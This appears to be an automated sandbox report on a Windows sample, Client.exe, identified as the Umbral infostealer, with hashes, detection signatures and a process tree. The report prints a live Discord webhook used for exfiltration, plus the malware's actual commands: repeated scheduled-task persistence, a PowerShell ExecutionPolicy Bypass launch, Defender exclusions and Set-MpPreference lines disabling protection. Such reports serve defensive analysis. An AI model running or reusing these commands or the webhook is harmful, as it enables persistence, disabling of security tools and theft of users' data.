Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-06-2024 01:53
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Client.exe
Resource
win10v2004-20240426-en
General
-
Target
Client.exe
-
Size
380KB
-
MD5
7091d715676e10c44205e6fa7f50b7bd
-
SHA1
a950398047b6b554181538d6e78ada18bfba510e
-
SHA256
23f43cc11c07245b3c5c14333a53b97330ebd7afa4a893245834fbebfa967d88
-
SHA512
2fd66a8fd5b4d0f1ef52f6cd89b8e14936b56fdb967a83382d8081e67fbbabdb609decef98d19c8caebcc1b5b9bcc3cbaa0209112c9c081556ff87bfcdf7308b
-
SSDEEP
6144:MwZC8z6GIwaC9M1G4TIcgGz+rH4uCBbhZnKMgVia:RZC8OGgt1G4TGY+NCNn4Vi
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1247729405409759390/zWUzhv3beId_l06S4nnTrfCRsAkIoHRjlpnuQcnbUkUm0eJjGGkP-VfghAOgfXCbrdiS
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/2848-10-0x0000000000870000-0x000000000087A000-memory.dmp disable_win_def -
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0004000000004ed7-49.dat family_umbral behavioral1/memory/2684-51-0x0000000000180000-0x00000000001C0000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Program Files\\$77fuh.exe" Client.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" Client.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" Client.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" Client.exe -
pid Process 2444 powershell.exe 1736 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts l1gdcwtr.ezy.exe -
Executes dropped EXE 1 IoCs
pid Process 2684 l1gdcwtr.ezy.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua Client.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" Client.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 discord.com 17 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\$77fuh.exe Client.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 46 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2924 schtasks.exe 2508 schtasks.exe 1148 schtasks.exe 2564 schtasks.exe 768 schtasks.exe 1996 schtasks.exe 2804 schtasks.exe 1476 schtasks.exe 1796 schtasks.exe 496 schtasks.exe 968 schtasks.exe 2588 schtasks.exe 1924 schtasks.exe 1580 schtasks.exe 1224 schtasks.exe 1236 schtasks.exe 2956 schtasks.exe 3008 schtasks.exe 2476 schtasks.exe 2728 schtasks.exe 1924 schtasks.exe 556 schtasks.exe 356 schtasks.exe 1448 schtasks.exe 960 schtasks.exe 2980 schtasks.exe 2348 schtasks.exe 2580 schtasks.exe 2556 schtasks.exe 1720 schtasks.exe 1148 schtasks.exe 900 schtasks.exe 1952 schtasks.exe 1640 schtasks.exe 2688 schtasks.exe 704 schtasks.exe 652 schtasks.exe 2044 schtasks.exe 2776 schtasks.exe 892 schtasks.exe 2800 schtasks.exe 944 schtasks.exe 1284 schtasks.exe 1416 schtasks.exe 1728 schtasks.exe 2604 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1956 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 960 PING.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2848 Client.exe 2848 Client.exe 2848 Client.exe 2848 Client.exe 2848 Client.exe 2848 Client.exe 2848 Client.exe 2848 Client.exe 2848 Client.exe 2848 Client.exe 2444 powershell.exe 2444 powershell.exe 2444 powershell.exe 1736 powershell.exe 2204 powershell.exe 1996 powershell.exe 792 powershell.exe 2272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2848 Client.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 2684 l1gdcwtr.ezy.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 792 powershell.exe Token: SeIncreaseQuotaPrivilege 2080 wmic.exe Token: SeSecurityPrivilege 2080 wmic.exe Token: SeTakeOwnershipPrivilege 2080 wmic.exe Token: SeLoadDriverPrivilege 2080 wmic.exe Token: SeSystemProfilePrivilege 2080 wmic.exe Token: SeSystemtimePrivilege 2080 wmic.exe Token: SeProfSingleProcessPrivilege 2080 wmic.exe Token: SeIncBasePriorityPrivilege 2080 wmic.exe Token: SeCreatePagefilePrivilege 2080 wmic.exe Token: SeBackupPrivilege 2080 wmic.exe Token: SeRestorePrivilege 2080 wmic.exe Token: SeShutdownPrivilege 2080 wmic.exe Token: SeDebugPrivilege 2080 wmic.exe Token: SeSystemEnvironmentPrivilege 2080 wmic.exe Token: SeRemoteShutdownPrivilege 2080 wmic.exe Token: SeUndockPrivilege 2080 wmic.exe Token: SeManageVolumePrivilege 2080 wmic.exe Token: 33 2080 wmic.exe Token: 34 2080 wmic.exe Token: 35 2080 wmic.exe Token: SeIncreaseQuotaPrivilege 2080 wmic.exe Token: SeSecurityPrivilege 2080 wmic.exe Token: SeTakeOwnershipPrivilege 2080 wmic.exe Token: SeLoadDriverPrivilege 2080 wmic.exe Token: SeSystemProfilePrivilege 2080 wmic.exe Token: SeSystemtimePrivilege 2080 wmic.exe Token: SeProfSingleProcessPrivilege 2080 wmic.exe Token: SeIncBasePriorityPrivilege 2080 wmic.exe Token: SeCreatePagefilePrivilege 2080 wmic.exe Token: SeBackupPrivilege 2080 wmic.exe Token: SeRestorePrivilege 2080 wmic.exe Token: SeShutdownPrivilege 2080 wmic.exe Token: SeDebugPrivilege 2080 wmic.exe Token: SeSystemEnvironmentPrivilege 2080 wmic.exe Token: SeRemoteShutdownPrivilege 2080 wmic.exe Token: SeUndockPrivilege 2080 wmic.exe Token: SeManageVolumePrivilege 2080 wmic.exe Token: 33 2080 wmic.exe Token: 34 2080 wmic.exe Token: 35 2080 wmic.exe Token: SeIncreaseQuotaPrivilege 1988 wmic.exe Token: SeSecurityPrivilege 1988 wmic.exe Token: SeTakeOwnershipPrivilege 1988 wmic.exe Token: SeLoadDriverPrivilege 1988 wmic.exe Token: SeSystemProfilePrivilege 1988 wmic.exe Token: SeSystemtimePrivilege 1988 wmic.exe Token: SeProfSingleProcessPrivilege 1988 wmic.exe Token: SeIncBasePriorityPrivilege 1988 wmic.exe Token: SeCreatePagefilePrivilege 1988 wmic.exe Token: SeBackupPrivilege 1988 wmic.exe Token: SeRestorePrivilege 1988 wmic.exe Token: SeShutdownPrivilege 1988 wmic.exe Token: SeDebugPrivilege 1988 wmic.exe Token: SeSystemEnvironmentPrivilege 1988 wmic.exe Token: SeRemoteShutdownPrivilege 1988 wmic.exe Token: SeUndockPrivilege 1988 wmic.exe Token: SeManageVolumePrivilege 1988 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2848 wrote to memory of 2568 2848 Client.exe 29 PID 2848 wrote to memory of 2568 2848 Client.exe 29 PID 2848 wrote to memory of 2568 2848 Client.exe 29 PID 2568 wrote to memory of 2556 2568 CMD.exe 31 PID 2568 wrote to memory of 2556 2568 CMD.exe 31 PID 2568 wrote to memory of 2556 2568 CMD.exe 31 PID 2848 wrote to memory of 2504 2848 Client.exe 32 PID 2848 wrote to memory of 2504 2848 Client.exe 32 PID 2848 wrote to memory of 2504 2848 Client.exe 32 PID 2504 wrote to memory of 2564 2504 CMD.exe 34 PID 2504 wrote to memory of 2564 2504 CMD.exe 34 PID 2504 wrote to memory of 2564 2504 CMD.exe 34 PID 2848 wrote to memory of 1576 2848 Client.exe 37 PID 2848 wrote to memory of 1576 2848 Client.exe 37 PID 2848 wrote to memory of 1576 2848 Client.exe 37 PID 1576 wrote to memory of 2688 1576 CMD.exe 39 PID 1576 wrote to memory of 2688 1576 CMD.exe 39 PID 1576 wrote to memory of 2688 1576 CMD.exe 39 PID 2848 wrote to memory of 1548 2848 Client.exe 40 PID 2848 wrote to memory of 1548 2848 Client.exe 40 PID 2848 wrote to memory of 1548 2848 Client.exe 40 PID 1548 wrote to memory of 1720 1548 CMD.exe 42 PID 1548 wrote to memory of 1720 1548 CMD.exe 42 PID 1548 wrote to memory of 1720 1548 CMD.exe 42 PID 2848 wrote to memory of 820 2848 Client.exe 43 PID 2848 wrote to memory of 820 2848 Client.exe 43 PID 2848 wrote to memory of 820 2848 Client.exe 43 PID 820 wrote to memory of 1924 820 CMD.exe 45 PID 820 wrote to memory of 1924 820 CMD.exe 45 PID 820 wrote to memory of 1924 820 CMD.exe 45 PID 2848 wrote to memory of 2300 2848 Client.exe 46 PID 2848 wrote to memory of 2300 2848 Client.exe 46 PID 2848 wrote to memory of 2300 2848 Client.exe 46 PID 2300 wrote to memory of 768 2300 CMD.exe 48 PID 2300 wrote to memory of 768 2300 CMD.exe 48 PID 2300 wrote to memory of 768 2300 CMD.exe 48 PID 2848 wrote to memory of 2280 2848 Client.exe 49 PID 2848 wrote to memory of 2280 2848 Client.exe 49 PID 2848 wrote to memory of 2280 2848 Client.exe 49 PID 2280 wrote to memory of 1580 2280 CMD.exe 51 PID 2280 wrote to memory of 1580 2280 CMD.exe 51 PID 2280 wrote to memory of 1580 2280 CMD.exe 51 PID 2848 wrote to memory of 1368 2848 Client.exe 52 PID 2848 wrote to memory of 1368 2848 Client.exe 52 PID 2848 wrote to memory of 1368 2848 Client.exe 52 PID 1368 wrote to memory of 1148 1368 CMD.exe 54 PID 1368 wrote to memory of 1148 1368 CMD.exe 54 PID 1368 wrote to memory of 1148 1368 CMD.exe 54 PID 2848 wrote to memory of 1532 2848 Client.exe 55 PID 2848 wrote to memory of 1532 2848 Client.exe 55 PID 2848 wrote to memory of 1532 2848 Client.exe 55 PID 1532 wrote to memory of 1284 1532 CMD.exe 57 PID 1532 wrote to memory of 1284 1532 CMD.exe 57 PID 1532 wrote to memory of 1284 1532 CMD.exe 57 PID 2848 wrote to memory of 2104 2848 Client.exe 58 PID 2848 wrote to memory of 2104 2848 Client.exe 58 PID 2848 wrote to memory of 2104 2848 Client.exe 58 PID 2104 wrote to memory of 1224 2104 CMD.exe 60 PID 2104 wrote to memory of 1224 2104 CMD.exe 60 PID 2104 wrote to memory of 1224 2104 CMD.exe 60 PID 2848 wrote to memory of 2072 2848 Client.exe 61 PID 2848 wrote to memory of 2072 2848 Client.exe 61 PID 2848 wrote to memory of 2072 2848 Client.exe 61 PID 2072 wrote to memory of 1996 2072 CMD.exe 63 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" Client.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" Client.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" Client.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2352 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2848 -
C:\Windows\system32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "C:\Program Files\$77fuh.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "C:\Program Files\$77fuh.exe"3⤵
- Creates scheduled task(s)
PID:2556
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2564
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2688
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1720
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1924
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:768
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1580
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1148
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1284
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1224
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1996
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:324
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:556
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:924
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1416
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1584
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1796
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1800
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1728
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2116
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2044
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1124
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2924
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2888
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:496
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1004
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1236
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1448
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1312
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:356
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:404
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:960
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1012
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2956
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:888
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:704
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1708
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2776
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1552
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3008
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2220
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2980
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1676
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:892
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2844
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2728
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:1516
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2800
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2588
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2908
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2348
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2304
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2508
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit2⤵PID:2768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"' & exit2⤵PID:2556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2444 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"5⤵
- Views/modifies file attributes
PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
